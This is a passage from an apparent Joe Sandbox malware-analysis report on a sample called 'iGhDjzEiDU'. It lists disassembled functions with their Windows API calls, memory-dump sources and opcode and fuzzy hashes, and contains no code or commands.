                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D23146B69002499FCB01CF99D940ADEBBF1FF49320F18805AE919A7361C735A914CF60
                                                                                                                                                                                                                                            Function 0552787A Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • DrawTextExW.USER32(?,?,?,?,?,?), ref: 05527917
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1700659197.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5520000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DrawText
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2175133113-0
                                                                                                                                                                                                                                            • Opcode ID: 56a40aef82d01b12368049fb2b2fd07019a14d2909c2f443d957c364da79e1ca
                                                                                                                                                                                                                                            • Instruction ID: 1506ad9461ab3b9cfc91ef032d64df93ba9d844470ec10a9735617323a842709
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 56a40aef82d01b12368049fb2b2fd07019a14d2909c2f443d957c364da79e1ca
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A31E2B5D102499FCB10CF9AD880A9EFBF5FB48324F24842AE919A7350D774A944CFA0
                                                                                                                                                                                                                                            Function 05527880 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • DrawTextExW.USER32(?,?,?,?,?,?), ref: 05527917
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1700659197.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5520000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DrawText
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2175133113-0
                                                                                                                                                                                                                                            • Opcode ID: 84308eaf35f84bc1db3a9add5ad5ccbc198ca0b575c394d4061e8585b06ccdf6
                                                                                                                                                                                                                                            • Instruction ID: b272c5cf016dc77de2808251d72767626f2210afba07a53520cc9d52b782f266
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 84308eaf35f84bc1db3a9add5ad5ccbc198ca0b575c394d4061e8585b06ccdf6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9B21CEB5D003599FDB10CF9AD880A9EFBF5FB48320F24842AE919A7350D774A944CFA4
                                                                                                                                                                                                                                            Function 0132E2C8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0132E34F
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1680898199.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_1320000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3793708945-0
                                                                                                                                                                                                                                            • Opcode ID: 66109bd75f1941af149aaf8c0904d50171c3cc0b8a3dcc381b8be3466135a100
                                                                                                                                                                                                                                            • Instruction ID: 61ad25f58dfb3a648deb34c4d572652533a38d80200c6337e83252761b46d380
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 66109bd75f1941af149aaf8c0904d50171c3cc0b8a3dcc381b8be3466135a100
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D221E6B59002589FDB10CF9AD584ADEBFF5FB48310F14841AE914A7310D374A944CF64
                                                                                                                                                                                                                                            Function 07991F64 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,07993312,?,?,?,?,?), ref: 079933B7
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1715142645.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7990000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateFromIconResource
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3668623891-0
                                                                                                                                                                                                                                            • Opcode ID: 16f1c60cebd41e3092ab1e3cc80e8588ef2ac013c857b01434bef3177e707b51
                                                                                                                                                                                                                                            • Instruction ID: d96df50499d8ef5cb3e225292894ce77196cf6e245c9e5f54f21f487c1612620
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 16f1c60cebd41e3092ab1e3cc80e8588ef2ac013c857b01434bef3177e707b51
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E81126B18003499FDB10CFAAC845BEEBFF8EB48324F24841AE914A7250C775A954DFA4
                                                                                                                                                                                                                                            Function 0132BFE0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0132C046
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1680898199.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_1320000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: HandleModule
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4139908857-0
                                                                                                                                                                                                                                            • Opcode ID: 693905c5ac69405694e63263f02bfe98678237c2c4969a5eda3df388c9136ac5
                                                                                                                                                                                                                                            • Instruction ID: 7f12ac6e64a6e15caea3f931d7969194a34540d0527babeb034dedad90fbb64e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 693905c5ac69405694e63263f02bfe98678237c2c4969a5eda3df388c9136ac5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 591110B6C002598FDB20DF9AC444ADEFBF4EF89324F24841AD518B7210C379A545CFA5
                                                                                                                                                                                                                                            Function 0797C4E8 Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: Hhq
                                                                                                                                                                                                                                            • API String ID: 0-4210879014
                                                                                                                                                                                                                                            • Opcode ID: c7fc6a79884a59a489c0c7e62720204ceb90bf6dac263d253e5c63996b6f1ae5
                                                                                                                                                                                                                                            • Instruction ID: 52b56731dbf1d1c10598fc7e419d4de89482d8a7a92c4a07f01af0446965749b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c7fc6a79884a59a489c0c7e62720204ceb90bf6dac263d253e5c63996b6f1ae5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 765108B17085129FD718DF2DD884A7DB7E9FF86224B14866AE119CB3A0CB31EC41C7A0
                                                                                                                                                                                                                                            Function 079756A0 Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: $dq
                                                                                                                                                                                                                                            • API String ID: 0-847773763
                                                                                                                                                                                                                                            • Opcode ID: f4b79686f64393aaebf80dcbb3a8ed03ab77f7375c7c8f2a6eea75c26ba2e355
                                                                                                                                                                                                                                            • Instruction ID: c71980055a47dc701beb198905eea2ea560533fdf2d9b615b7c80925d97aa256
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f4b79686f64393aaebf80dcbb3a8ed03ab77f7375c7c8f2a6eea75c26ba2e355
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D3214FF4710605CFCB949E39884862A37E9BFC5618B268469D606CF3A1DF20DD11CB51
                                                                                                                                                                                                                                            Function 07975690 Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: $dq
                                                                                                                                                                                                                                            • API String ID: 0-847773763
                                                                                                                                                                                                                                            • Opcode ID: 9ab02a00c14bfbcd80aad52dacc36beef129c64a70fd54fa9a16daaed1401b83
                                                                                                                                                                                                                                            • Instruction ID: 26518dc698e5830be035676f98efad520a5b4b8b6d6d125befe6eebfc62a3642
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9ab02a00c14bfbcd80aad52dacc36beef129c64a70fd54fa9a16daaed1401b83
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1F21C3F4720602CFDB949E39C84862937E9FF85619B2684AAE506CF3A1EF34C911CB51
                                                                                                                                                                                                                                            Function 079770BB Relevance: .4, Instructions: 410COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: ffda4e75660cf0c5503e27f3b4e3d608c30cfa3ac19ad64c9175546b90cb860d
                                                                                                                                                                                                                                            • Instruction ID: 859d96556201b938315536450c4ed83c97c66d61353f8bcd2d9e751d26f62f9c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ffda4e75660cf0c5503e27f3b4e3d608c30cfa3ac19ad64c9175546b90cb860d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5702F5747002059FCB58DFA8D498AAD7BF2FF89314F1585A8E4099B3A6DB31EC85CB50
                                                                                                                                                                                                                                            Function 0797B460 Relevance: .3, Instructions: 339COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: a4d5f0c110330db797b78c5ca3ea525abba293312f69cb8bebefbeeeeeb2e9f0
                                                                                                                                                                                                                                            • Instruction ID: bc6634147a54c807b59a50e9d7c6e05cc15ab943f64624ed5467f1bee289b887
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a4d5f0c110330db797b78c5ca3ea525abba293312f69cb8bebefbeeeeeb2e9f0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4CD160B0600705CFC729DF38C490AAE77B6EF85229F544A6EE0529B3E1DB35E885CB10
                                                                                                                                                                                                                                            Function 079733E2 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 132add3e40579a4f142ed371693f39076ef03aa5e95e305d5273e63fd802d312
                                                                                                                                                                                                                                            • Instruction ID: 97717130fde928c08713c3bc56067d3bef5f8f71e76d7b405d132b7fade4fc2f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 132add3e40579a4f142ed371693f39076ef03aa5e95e305d5273e63fd802d312
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4D1E8B4A00245CFCB14CF68C589EA9B7F6FF45319F6685A9E4099B361CB30ED86DB40
                                                                                                                                                                                                                                            Function 0797FD68 Relevance: .2, Instructions: 195COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 9424efe47f7b81de296a4037bebcc36cd5a6ce9bc3347f3b8e557a955941fd0b
                                                                                                                                                                                                                                            • Instruction ID: 5f8771ec35d935915b77cb042c25587c5adb60ae81871bd820032d9da08cd909
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9424efe47f7b81de296a4037bebcc36cd5a6ce9bc3347f3b8e557a955941fd0b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 586193B0E08209CFCB18CFA9D4446AEBBF7BF89304F14946AD419F7251DB349942CB61
                                                                                                                                                                                                                                            Function 0797C2B0 Relevance: .2, Instructions: 170COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: f471bfaeacd8198e04e90b5e9020980fd09d7d4cc81d9397a8d539b96e13ebc4
                                                                                                                                                                                                                                            • Instruction ID: b2d9edc36db731f0ee36d7e8e667e8f088c50cf837b84807bf123a9cf98237d5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f471bfaeacd8198e04e90b5e9020980fd09d7d4cc81d9397a8d539b96e13ebc4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E45171B0700706CFDB149B64C889BFA77EAFF85309F508429E14ADB290DFB5A885CB51
                                                                                                                                                                                                                                            Function 07979E4C Relevance: .1, Instructions: 137COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 79578a5fc2d5a4b21b4de2fe7d52051f73b897a2bb17683986f0757c8818b659
                                                                                                                                                                                                                                            • Instruction ID: 2d90001c32d7818cf5e18bb6e71bd11a28934aad1c3b0be7d4ef265aad3c4ebc
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 79578a5fc2d5a4b21b4de2fe7d52051f73b897a2bb17683986f0757c8818b659
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 685193B03006069FC714DF68D494A6A77E6FF85324F148A69E51ACB364DF71EC45CB90
                                                                                                                                                                                                                                            Function 0797CC68 Relevance: .1, Instructions: 135COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 3fdfe60c08d15340e1eb4dde0812e9a859493ab3a5954c75cc1879f5c9a93835
                                                                                                                                                                                                                                            • Instruction ID: b30e79fe9b3f654ffae635614b2cbac628ee232333fa18724c9df57543c817b3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3fdfe60c08d15340e1eb4dde0812e9a859493ab3a5954c75cc1879f5c9a93835
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6D4160B53006028FCB24DF29C8C4B6977AEFF86619F158469E44ACB261DE34EC81DB61
                                                                                                                                                                                                                                            Function 07972670 Relevance: .1, Instructions: 121COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: f64d048e6456792c78c3fdbb541be665c4870261f7fce10299371a8e85312929
                                                                                                                                                                                                                                            • Instruction ID: 913d712487da0792dea12708e8fb64f7fa4a46f0dfdc7dd696000487ceabbf4a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f64d048e6456792c78c3fdbb541be665c4870261f7fce10299371a8e85312929
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6841F4B17106159FCB25DB28C9447AAB7EAFFC4324F14846ED40ACB384CB75A845CB91
                                                                                                                                                                                                                                            Function 07977BC0 Relevance: .1, Instructions: 118COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 08fabb22d8afe51da6f278367c9ec573413b562eee10c58fb8b157256a652f75
                                                                                                                                                                                                                                            • Instruction ID: 6fb3823eed06931c6d7db23119bafd364e789d8b94fbbe19ee1e0c1f5cd0ceb6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 08fabb22d8afe51da6f278367c9ec573413b562eee10c58fb8b157256a652f75
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 204164B0300A02DFD7259F64C484B6AB3B6BFC5318F54856DD1068B3A1DB75AC46CBA1
                                                                                                                                                                                                                                            Function 0797CC58 Relevance: .1, Instructions: 117COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: e4ec63f01784ed84218cf740aa2d21ceb62d4f8f6bd9b39684dcdafc407cb78e
                                                                                                                                                                                                                                            • Instruction ID: 8a38bc9b6c95e603a953a7112f1f989e686c1bc4087072a13ce7bf7dfeb144ec
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e4ec63f01784ed84218cf740aa2d21ceb62d4f8f6bd9b39684dcdafc407cb78e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7E4182B53006128FCB25DB28C8D4BA977AEAF86618F15445AE44ACB2A1DB30DC81D761
                                                                                                                                                                                                                                            Function 07977BD0 Relevance: .1, Instructions: 117COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: a034936430663f642abb9d9c1531e64792e19ecb3b30c380d12bca2f6b364044
                                                                                                                                                                                                                                            • Instruction ID: 063d4ea2624df5344cf7ca966f48131d3ded3e8ba2d61effb53d3cd946878940
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a034936430663f642abb9d9c1531e64792e19ecb3b30c380d12bca2f6b364044
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 454141B0300A05DFD729AF64C494B6AB3B6BFC9318F54856DD1068B3A0DF71AC46CBA1
                                                                                                                                                                                                                                            Function 0797FE18 Relevance: .1, Instructions: 114COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 4fce3f917debceaa0906834efb246b66384108bbb88f50d2441bacb5ae0fdc6b
                                                                                                                                                                                                                                            • Instruction ID: 287f2a305c10d8f89998d4ad971b44a58b0a12a2186e045aebbdbca9c2762bc1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4fce3f917debceaa0906834efb246b66384108bbb88f50d2441bacb5ae0fdc6b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7F4125B4D19208CFDB04CFAAD4416EEBBF6AF8E304F14D46AE819B3251DB744942CB64
                                                                                                                                                                                                                                            Function 079767A0 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 91a489421961a517fe879d2a34cb89871e751973d534ad23fb5382fb42671258
                                                                                                                                                                                                                                            • Instruction ID: 10fefa8d68b80cddafcb85ecc8b3c7692c38d0cf6b69613a743dcd0f19ba59dc
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 91a489421961a517fe879d2a34cb89871e751973d534ad23fb5382fb42671258
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C0310AB43106018FDB58DB29C498F6A73AAFF85718F1584A9E44ADB361EE30EC41CB51
                                                                                                                                                                                                                                            Function 0797B349 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 187e3b9250dc043b04f95de1fad479cc7aff68c6933820b7930ac2e17a824cfb
                                                                                                                                                                                                                                            • Instruction ID: f275ea7085cc0a0890406a048eb579d1e882bf3665c88b7d6157248a91eab42f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 187e3b9250dc043b04f95de1fad479cc7aff68c6933820b7930ac2e17a824cfb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B3157B57002169FCB15DF68C884AADBBB6BF88724F1046A9E525CB2B1CB70DD41CB90
                                                                                                                                                                                                                                            Function 079745EC Relevance: .1, Instructions: 100COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 311792de106a5089ef37410e72e8b171e9c7881dc217129c7fbe557811892eb6
                                                                                                                                                                                                                                            • Instruction ID: ca8639739c56d93ef6a986eeb80c12b3539ce6cee7bbd8dc936d0b652f6189c1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 311792de106a5089ef37410e72e8b171e9c7881dc217129c7fbe557811892eb6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4031F4B1B087908FCB1ACB68D8548997BF6AF8275570A90FBD005CB6B3EA34DC45CB51
                                                                                                                                                                                                                                            Function 07975798 Relevance: .1, Instructions: 99COMMON
